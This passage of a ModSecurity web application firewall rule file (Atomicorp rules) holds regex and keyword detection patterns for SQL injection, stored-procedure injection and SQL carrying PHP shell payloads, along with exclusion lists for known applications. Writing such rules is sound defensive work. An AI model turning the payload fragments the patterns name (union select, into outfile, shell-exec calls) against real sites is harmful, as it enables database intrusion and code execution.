(?i:[\"'`](?:\s*?(?:(?:\*.+(?:(?:an|i)d|between|like|x?or|div)\W*?[\"'`]|(?:between|like|x?or|and|div)\s[^\d]+[\w-]+.*?)\d|[^\w\s?]+\s*?[^\w\s]+\s*?[\"'`]|[^\w\s]+\s*?[\W\d].*?(?:--|#))|.*?\*\s*?\d)|[()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,]|\^[\"'`])" "id:344374,rev:2,phase:2,deny,status:403,capture,t:none,t:urlDecodeUni,msg:'Atomicorp.com WAF Rules: SQL Injection Attack attempt',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:'CRITICAL'"



SecRule ARGS|!ARGS:/^cms_partial/|!ARGS:/type/|!ARGS:/searchClause/|!ARGS:import|!ARGS:DR|!ARGS:SAMLResponse|!ARGS:/wizArray/|!ARGS:/^Cms_Page/|!ARGS:search|!ARGS:pagetext|!ARGS:/database/|!ARGS:/^vpinfo/|!ARGS:website|!ARGS:suffix|!ARGS:Body|!ARGS:wikitext|!ARGS:type|!ARGS:content|!ARGS:areas|!ARGS:templatecode|!ARGS:website|!ARGS:/insertstring/|!ARGS:signature|!ARGS:/description/|!ARGS:Db_submit|!ARGS:text|!ARGS:code|!ARGS:comment|!ARGS:/sql/|!ARGS:prefix|!ARGS:/message/|!ARGS:query|!ARGS:/sql/|!ARGS:prefix|!ARGS:resolution|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/ "@pmFromFile sql.txt"  "phase:2,deny,log,auditlog,status:403,capture,id:340155,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,rev:25,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',tag:'SQLi'"

SecMarker END_SQL_CHECKS_PM1

#Always SQL injection cases w/ antievasion
#SecRule ARGS|!ARGS:/installcode/|!ARGS:/sql/|!ARGS:prefix|!ARGS:s_manifest|!ARGS:/database/|!ARGS:content|!ARGS:newcontent|!ARGS:query|!ARGS:/description/|!ARGS:/text/|!ARGS:Db_submit|!ARGS:/table/|!ARGS:EXPORTTABLE|!ARGS:/message/|!ARGS:previous_field|ARGS_NAMES|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:X-PageView|!ARGS_NAMES:/varchar/|!ARGS_NAMES:cfg_xsp_password|!ARGS:/body/|!ARGS:runQuery|!ARGS:field_type[]|!ARGS:/^field_type/|!ARGS:/^fieldtype_/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/subject/ "@pmFromFile sql.txt" "phase:2,deny,status:403,capture,id:340160,t:none,t:replaceComments,t:compressWhiteSpace,rev:30,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',chain"
#SecRule ARGS:module "!(^modulebuilder$)" "t:none,t:lowercase"
#SecRule REQUEST_URI "/index\.php\?module=administration"

#Always SQL injection cases w/ antievasion
SecRule ARGS|!ARGS:pagetext|!ARGS:/wizArray/|!ARGS:/database/|!ARGS:/installcode/|!ARGS:areas|!ARGS:templatecode|!ARGS:s_manifest|!ARGS:Db_submit|!ARGS:/database/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|ARGS_NAMES|!ARGS:/description/|!ARGS:/insertstring/|!ARGS_NAMES:/conf_varchar/|!ARGS_NAMES:table_name|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES_NAMES:/sql/ "@pmFromFile sql.txt" "phase:2,deny,log,auditlog,status:403,capture,id:380023,t:none,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',tag:'SQLi'"

#Always SQL injection cases w/ antievasion
SecRule ARGS|!ARGS:pagetext|!ARGS:message|!ARGS:/wizArray/|!ARGS:/database/|!ARGS:Db_submit|!ARGS:areas|!ARGS:templatecode|!ARGS:/description/|!ARGS:/sql/|!ARGS:prefix|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:query|ARGS_NAMES|!ARGS_NAMES:table_name|REQUEST_HEADERS|XML:/*|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/ "@pmFromFile sql.txt"  "phase:2,deny,log,auditlog,status:403,capture,id:380024,t:none,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,rev:5,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL Injection protection',logdata:'%{TX.0}',tag:'SQLi'"


SecMarker END_SQL_CHECKS

SecRule REQUEST_URI "union ?\(?select ?\(" "phase:1,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace,msg:'Atomicorp.com WAF Rules: SQL injection',id:380123,rev:5,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"

####################################
#First major set
Secrule REQUEST_URI "^/(?:eprocservice/supplierinboundservice|ntunnel_mysql)" "phase:2,id:344356,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_INJECTION_RULES_ALL"

SecRule REQUEST_URI|REQUEST_COOKIES|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|REQUEST_HEADERS|ARGS|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:templatecode|!ARGS:/insertstring/|!ARGS:areas|XML:/* "@pm select having grant delete insert drop alter replace truncate update create rename describe table database dba index into from convert bulk column update set union or = ' -- procedure declare serialize passthru outfile null <> eval create_function system exec trucate sleep benchmark create_function reg_replace(" "phase:2,id:'333799',t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334363,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_1"


#allow for truevault
SecRule REQUEST_URI "^(?:/([a-z0-9]+/)?wp-load\.php\?vaultpress=true|/ntunnel_mysql|^/\?r=events/update)" "phase:2,id:336317,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_RULE_380122"

#SQL stored procedure injection
SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|XML:/*|ARGS|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:/database/|!ARGS:comment|!ARGS:templatecode|!ARGS:areas|!ARGS:content|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/text/|!ARGS:/message/|!ARGS:/body/ "(?:procedure\s+analyse\s.{0,100}\(|create\s+(procedure|function)\s.{0,100}\w+\s.{0,100}\(\s.{0,200}\)\s.{0,100}declare[^\w]+[@#]\s.{0,100}\w+|exec\s.{0,100}\(\s.{0,200}@|\b(?:sleep|benchmark)\b ?\( ?[0-9])" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: MySQL and PostgreSQL stored procedure/function injections',id:380122,rev:5,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"

SecMarker END_RULE_380122

#allow for truevault
SecRule REQUEST_URI "^/administrator/index\.php\?option=com_hikashop&ctrl=" "phase:2,id:346317,t:none,t:lowercase,pass,nolog,noauditlog,skipAfter:END_RULE_380025"

#PHP shell code SQL injection
SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|ARGS|!ARGS:/database/|!ARGS:SAMLResponse|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:areas|!ARGS:/database/|!ARGS:comment|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/prefix/|!ARGS:/suffix/|!ARGS:definition|XML:/* "(?:\bunion\b.{1,100}?\bselect\b.{1,100}?php.{1,100}?(?:passthru|serialize|system|eval|create_function|create_function|preg_\w+|exec|shell_exec ?(?:\(|\: ?'?))|select.{1,100}?(?:php|perl).{1,100}?into outfile|reg_replace ?\()" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,msg:'Atomicorp.com WAF Rules: SQL injection with PHP/PERL payload',id:380025,rev:8,logdata:'%{TX.0}',severity:'2',tag:'SQLi',tag:'RCE'"



SecMarker END_RULE_380025

# Rule 340013:
#Prevent SQL injection in cookies
SecRule REQUEST_COOKIES|REQUEST_HEADERS:User-Agent|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES:/sql/ "(?:\b(?:select|grant|delete|insert|alter|replace|truncate|update|create|rename|describe)\b[[:space:]]+[a-z|0-9|\*| |\}|\{|\,\(\)]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|\bunion\b.{1,100}?\bselect\b.[a-z0-9]|select (?:load_file|char\()|(?:insert|remark)test;|\bdrop (?:all tables|table [a-z0-9]+|[a-z0-9]+) ?;)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,id:340013,rev:4,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection in cookie or UA',logdata:'%{TX.0}',tag:'SQLi'"

# Rule 340015:
#Prevent SQL injection in UA
#SecRule REQUEST_HEADERS:User-Agent "(?:(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]|union select [a-z0-9])" "t:replaceComments,t:compressWhiteSpace,id:340015,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection in User Agent header'"
#
SecRule REQUEST_URI "(?:(?:/wp-admin/post|privmsg|/ticket/admin|/misc|tiki-editpage|/post|/imp/compose|/posting)\.php|/modules\.php\?op=modload&name=(?:downloads|submit_news)|/admin\.php\?module=ns\-addStory\&op=|/index\.php\?name=pnphpbb2&file=posting&mode=reply|/phpmyadmin/|/pnphpbb2-posting\.html|/otrs/index\.pl|tiki-index\.php\?page=|/index\.php\?title=.*&action=edit|/node/[0-9]+/edit|/editcode/|^/ntunnel_mysql/^/([a-z0-9]+/)index\.php\?controller=adminmodules\?configure=megaimporter)" "phase:2,t:none,t:lowercase,pass,nolog,noauditlog,id:340015,skipAfter:END_RULE_340016"

# Rule 340016:
SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|!REQUEST_COOKIES:/sql/|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES:/utm/|!REQUEST_COOKIES:/_pk_ref/|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|ARGS|XML:/*|!ARGS:/opgaver/|!ARGS:/^Cms_Page/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:/brief/|!ARGS:templatecode|!ARGS:area|!ARGS:/changelog/|!ARGS:permissions|!ARGS:/^p_posts/|!ARGS:po|!ARGS:et_pb_unprocessed_data|!ARGS:data|!ARGS:contenido|!ARGS:content|!ARGS:/siteorigin/|!ARGS:panels_data|!ARGS:source|!ARGS:/calotropis/|!ARGS:/searchclause/|!ARGS:resolution|!ARGS:SAMLResponse|!ARGS:/^info/|!ARGS:/narrative/|!ARGS:/FCKeditor/|!ARGS:/txt/|!ARGS:inc|!ARGS:op|!ARGS:_signature|!ARGS:/^label_/|!ARGS:/teaser/|!ARGS:bio|!ARGS:/installcode/|!ARGS:UserData|!ARGS:code|!ARGS:/report/|!ARGS:/^gcaption/|!ARGS:/^p_process_chats/|!ARGS:/database/|!ARGS:/^para/|!ARGS:/comment/|!ARGS:/keywords/|!ARGS:cf85|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/desc/|!ARGS:movie_brief|!ARGS:/text/|!ARGS:/message/|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:edited|!ARGS:content|!ARGS:Post|!ARGS:body|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:response[14]|!ARGS:/article/|!ARGS:data[Application][cv] "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\*|\.|\,|\(|\)|_|\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\{|\.|\,|\(|\)|_|\-]|\bunion\b.{1,256}?select.{1,256}[a-z0-9\(\)].{1,256}(?:from|#|, ?[0-9a-z]|--)|\bselect\b.{1,256}?(?:load_file|char\()|(?:insert|remark)test ?;|insert [a-z|0-9|\*|\,]+ (?:from|into|table|database|index|view|\{|\'|\`)[[:space:]]+\(|update [a-z0-9]+set |insert into (?:\{|\'|\`)|\btruncate table|delete from [a-z0-9]+ where|\' or true --|create (?:database|table) [a-z0-9]+ ?;|\breplace ?\( \'|\bgrant [a-z]+ on |select[[:space:]]+(?:[a-z|0-9|\*|\.|\,|\(|\)|_|\-]|[a-z|0-9|\*|\.|\,|\(|\)|_|\-] ?, ?)+[[:space:]]+(?:into|from|table|index|view)[[:space:]]+[a-z|0-9|\*| |\{|\.|\,|\(|\)|_|\-]|\bdrop (?:all tables|table [a-z0-9]+|[a-z0-9]+) ?;|\balter\b [a-z0-9]+ [a-z0-9]+ ?\;)" "phase:2,deny,log,auditlog,status:403,capture,multimatch,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:removecomments,t:compressWhiteSpace,id:340016,rev:48,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection attempt detected',logdata:'%{TX.0}',tag:'SQLi'"

SecMarker END_RULE_340016

#bypass for these, no args
SecRule TX:STATIC "@eq 1" "phase:2,id:'333800',pass,t:none,nolog,noauditlog,skipAfter:END_SQL_CHECKS_2"

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:'333800',pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS_2

# Rule 340017:
SecRule REQUEST_URI|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|ARGS|!ARGS:SAMLResponse|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:ncontent|!ARGS:/body/|!ARGS:/installcode/|!ARGS:code|!ARGS:/content/|!ARGS:/database/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comment|!ARGS:comments|!ARGS:text|!ARGS:/description/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:introtext|!ARGS:Post|!ARGS:itembigtext|!ARGS:/article/|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:/message/|!ARGS:content_en|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1|!ARGS:/narrative/|!ARGS:/FCKeditor/|!ARGS:data "(?:insert into values|select from [a-z|0-9]+!( and)|bulk insert |union select|union all select|convert \(.{1,256}from|select (?:load_file|char\(|\* from)|(?:insert|remark)test;)"  "phase:2,deny,log,auditlog,status:403,capture,t:none,t:lowercase,t:replaceComments,t:compressWhiteSpace,chain,id:340017,rev:49,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS',logdata:'%{TX.0}',tag:'SQLi'"
SecRule REQUEST_URI "!(?:^/edit_page$|/node/[0-9]+/edit|^/forum/posting\.php|^/admins/wnedit\.php|modules\.php\?name=morums&file=posting&mode=|^/joomla/administrator/index2\.php|^/wiki/index\.php?.*action=submit|^/imp/compose\.php|^/horde/imp/compose\.php|/sql.php|/tbl_(?:change|s(?:ql|tructure))\.php|/admincp/template\.php\?do=(?:insert|update)template|admin/area/save-page\.php$|^/cgi-bin/cookmail\.exe$|^/catalog/secure_admin/categories\.php\?cpath=)"  "t:none,t:lowercase"

# Rule 340144: Generic SQL sigs
SecRule REQUEST_URI "!(?:(?:/wp-admin/post|privmsg|/ticket/admin|/misc|tiki-editpage|/post|/horde3?/imp/compose|/posting)\.php|/modules\.php\?op=modload&name=(?:Downloads|Submit_News)|/admin\.php\?module=NS\-AddStory\&op=|/index\.php\?name=pnphpbb2&file=posting&mode=reply|/phpmyadmin/|/pnphpbb2-posting\.html|/otrs/index\.pl|tiki-index\.php\?page=|/index\.php\?title=.*&action=edit|/node/[0-9]+/edit|/joomla/administrator/index2\.php|module=admin&act=dispLayoutAdminEdit&layout_srl=|upgrade.php?step=|^/ubbthreads/install/|^/projects/csb/milestone$|^/backoffice/index\.php\?controller=admintranslations|^/admin/applications/edit/)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:lowercase,id:340144,rev:38,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2',chain,logdata:'%{TX.0}',tag:'SQLi'"
SecRule REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES:/temp_widdit/|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|ARGS|!ARGS:/body_/|!ARGS:shortcode|!ARGS:/description/|!ARGS:/sys_template/|!ARGS:/^Cms_Page/|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:templatecode|!ARGS:areas|!ARGS:body|!ARGS:/teaser/|!ARGS:/content/|!ARGS:wpSummary|!ARGS:ncontent|!ARGS:/installcode/|!ARGS:/database/|!ARGS:code|!ARGS:/report/|!ARGS:/database/|!ARGS:/text/|!ARGS:comment|!ARGS:/txt/|!ARGS:blogText|!ARGS:sendDescription|!ARGS:exec[text]|!ARGS:keywords|!ARGS:tiny_vals|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:/message/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:query_string|!ARGS:query|!ARGS:description|!ARGS:/^para/|!ARGS:/narrative/|!ARGS:/FCKeditor/|!ARGS:/^info/|!ARGS:content|!ARGS:data|!ARGS:/^p_posts/|!ARGS:questions_detail "(?:\b(?:alter|drop)\b [a-z0-9]+ \b(?:column|database|procedure|table)\b|delete[[:space:]] .{1,100}+ update [a-z0-9]+ set .{1,100}+=|union all select |\bunion\b.{1,100}?\bselect\b.{0,200}[a-z0-9]+ from |select (?:load_file|char ?\()|(?:insert|remark)test;)|\bcreate\b table [a-z0-9]+ \("  "t:none,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhiteSpace"

SecMarker END_SQL_CHECKS_2

# Rule 340145: Generic SQL sigs
SecRule REQUEST_URI|ARGS|XML:/*|!ARGS:datafile|!ARGS:SAMLResponse|!ARGS:/cleandata/|!ARGS:FCKeditor|!ARGS:output|!ARGS:/^parabola_settings/|!ARGS:explanation|!ARGS:/^wp_meta_box/|!ARGS:/post/|!ARGS:product[name]|!ARGS:cookie|!ARGS:/^field\[6\]$/|!ARGS:UserData|!ARGS:serData|!ARGS:/^Cms_Page/|!ARGS:/^autoDS/|!ARGS:/^pages/|!ARGS:prefix|!ARGS:suffix|!ARGS:qa_answer|!ARGS:areas|!ARGS:templatecode|!ARGS:featured_ids|!ARGS:/teksti/|!ARGS:/^jform/|!ARGS:callforprice|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:condition|!ARGS:/^chronofield/|!ARGS:resolution|!ARGS:/desc/|!ARGS:/^cforms/|!ARGS:special|!ARGS:/email|!ARGS:/body/|!ARGS:/installcode/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/comment/|!ARGS:/content/|!ARGS:newcontent|!ARGS:/text/|!ARGS:/txt/|!ARGS:khxc_incphp--filename|!ARGS:/file_content/|!ARGS:filecontent|!ARGS:/message/|!ARGS:defaultParamList|!ARGS:body|!ARGS:gbu0_proddetdisp--incdisp|!ARGS:gbu0_prodcatdisp--incdisp "(?:or [0-9] ?= ?[0-9]|admin'(?: --| #)|or (?:'|\")? ?(?:0|1|2|3|a|b) ?(?:'|\")? ?= ?(?:'|\")? ?(/:0|1|2|3|a|b) ?(?:'|\")?|having 1 ?= ?1 ?--|null is null ?--| \b(\d+) ?(?:=|<>|<=>|\!=) ?[0-3]\b)" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:replaceComments,t:replaceNulls,t:compressWhitespace,t:lowercase,capture,id:340145,rev:43,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe',logdata:'%{TX.0}',tag:'SQLi'"
SecRule REQUEST_URI "!(?:/index\.php/admin/catalog_category/save|(?:/admin/stats|/css/gallery-css)\.php\?1=1|/admin\.php\?tile=mail$|/catalog_category/save/key/|/\?op=admin_settings|^/\?openpage=|^/admin/extra|^/node/[0-9]+/edit\?destination=admin/content|^/administrator/index\.php\?option=com_chronoforms)" "t:none,t:lowercase"

# Rule 390572: Generic SQL sigs
SecRule ARGS|XML:/*|!ARGS:datafile|!ARGS:SAMLResponse|!ARGS:/cleandata/|!ARGS:serData|!ARGS:explanation|!ARGS:/post/|!ARGS:/^wp_meta_box/|!ARGS:cookie|!ARGS:/^field\[6\]$/|!ARGS:/^autoDS/|!ARGS:pagetext|!ARGS:featured_ids|!ARGS:/^pages/|!ARGS:/^Cms_Page/|!ARGS:qa_answer|!ARGS:/teksti/|!ARGS:areas|!ARGS:templatecode|!ARGS:/^jform/|!ARGS:callforprice|!ARGS:condition|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:prefix|!ARGS:pagetext|!ARGS:suffix|!ARGS:special|!ARGS:description|!ARGS:resolution|!ARGS:/^chronofield/|!ARGS:memo|!ARGS:/^cforms/|!ARGS:/email|!ARGS:/body/|!ARGS:contenido|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:/comment/|!ARGS:content|!ARGS:/descr/|!ARGS:newcontent|!ARGS:/text/|!ARGS:/txt/|!ARGS:/installcode/|!ARGS:/database/|!ARGS:khxc_incphp--filename|!ARGS:/file_content/|!ARGS:filecontent|!ARGS:/message/|!ARGS:defaultParamList|!ARGS:body|!ARGS:/^gbu0/ "(?:or.{1,100}1[[:space:]].{,100}=[[:space:]]1|or 1=[0-9]|admin'(?: --| #)| or '1'='1--|having 1 ?= ?1 --|or\+1=[0-9]|null is null ?--|(?:and|or) ?(\d+) ?(?:=|<>|<=>|!=) ?[1-3]\b)" "phase:2,deny,log,auditlog,status:403,chain,t:none,t:urlDecodeUni,t:lowercase,t:replaceComments,t:compressWhitespace,capture,id:390572,rev:22,severity:2,msg:'Atomicorp.com WAF Rules: Attack Blocked -  SQL injection probe',logdata:'%{TX.0}',tag:'SQLi'"
SecRule REQUEST_URI "!(?:/(?:catalog_category|featured)/save|(?:/admin/stats|/css/gallery-css)\.php\?1=1|/admin\.php\?tile=mail$|/\?op=admin_settings|^/\?openpage=|^/node/[0-9]+/(?:edit|webform/))" "t:none,t:lowercase"

# Rule 340146: Meta character SQL injection
SecRule REQUEST_URI "(?:insert[[:space:]]+into.+values|select (\*|[a-z0-9]+) from.+[a-z|0-9|\{]|select.+from|bulk[[:space:]]+insert|union.+select|select (?:load_file|char\()|convert ?\(from|and.{1,256}char\(|(?:insert|remark)test ?;)" "phase:2,deny,log,auditlog,status:403,chain,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:replaceNulls,t:lowercase,id:340146,rev:8,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL metacharacter URI injection protection',logdata:'%{TX.0}',tag:'SQLi'"
SecRule ARGS:boattype "!(^select)" "t:none,t:lowercase"


SecMarker END_SQL_INJECTION_RULE_1

####################### Second Set
#

SecRule TX:STATIC "@eq 1" "phase:2,id:'333801',pass,t:none,nolog,noauditlog,skipAfter:END_SQL_CHECKS_3"

#SecRule REQUEST_FILENAME "\.(?:(?:m|j)pe?g4?|bmp|tiff?|p(?:(?:p|g|b)m|n(?:g|m)|df)|gif|css|ico|avi|flv|w(?:m(?:v|a)|ebp)|mp(?:3|4)|cgm|svg|swf|og(?:m|v|x)|doc|xls|od(?:t|s)|ppt|wbk)$" phase:2,id:333801,pass,t:none,t:lowercase,nolog,noauditlog,skipAfter:END_SQL_CHECKS_3


SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:SAMLResponse|!ARGS:contenido|!ARGS:/sql/|!ARGS:/^Cms_Page/|!ARGS:prefix|!ARGS:/database/|!ARGS:pagetext|!ARGS:query|REQUEST_HEADERS|!ARGS:/FCKeditor/|!ARGS:/narrative/|!ARGS:/insertstring/|!ARGS:templatecode|!ARGS:areas "@pm select outfile exec passthru serialize preg_ eval create_function create_function union concat file_put_contents" "phase:2,id:333802,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,multimatch,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:333701,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_2"

#shell code SQL injection
SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:/sql/|!ARGS:prefix|!ARGS:contenido|!ARGS:query|!ARGS:/message/|!ARGS:templatecode|!ARGS:/^Cms_Page/|!ARGS:areas|!ARGS:pagetext|REQUEST_HEADERS|!REQUEST_HEADERS:Referer|!REQUEST_HEADERS:Cookie|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|!REQUEST_COOKIES_NAMES:/utm/|!REQUEST_COOKIES_NAMES:/_pk_ref/|!ARGS:/narrative/|!ARGS:templatecode|!ARGS:areas "(?:(?:\bunion\b.{1,100}?\bselect\b.{1,100}?php.{1,100}?(?:system|create_function|create_function|eval ?\(|shell_exec|passthru|serialize|preg_\w+|exec).{1,100}?into)|select.{1,100}?(?:php|perl).{1,100}?into outfile|union select all|concat ?\(user_|insert into.{1,100}file_put_contents)" "phase:2,deny,log,auditlog,status:403,capture,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,multimatch,msg:'Atomicorp.com WAF Rules: SQL injection with payload - base64 encoded',id:381025,rev:4,logdata:'%{TX.0}',severity:'2',tag:'SQLi'"
SecMarker END_SQL_INJECTION_RULE_2

SecRule REQUEST_URI|XML:/*|ARGS|!ARGS:contenido|!ARGS:/sql/|!ARGS:/^Cms_Page/|!ARGS:prefix|!ARGS:/database/|!ARGS:/insertstring/|!ARGS:pagetext|!ARGS:query|!ARGS:/message/|!ARGS:/narrative/|!ARGS:areas|!ARGS:templatecode "@pm file_put_contents select outfile exec passthru serialize" "phase:2,id:333803,t:none,t:urlDecodeUni,t:removeComments,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:334364,t:none,pass,nolog,noauditlog,skipAfter:END_SQL_INJECTION_RULE_3"

#PHP shell code SQL injection
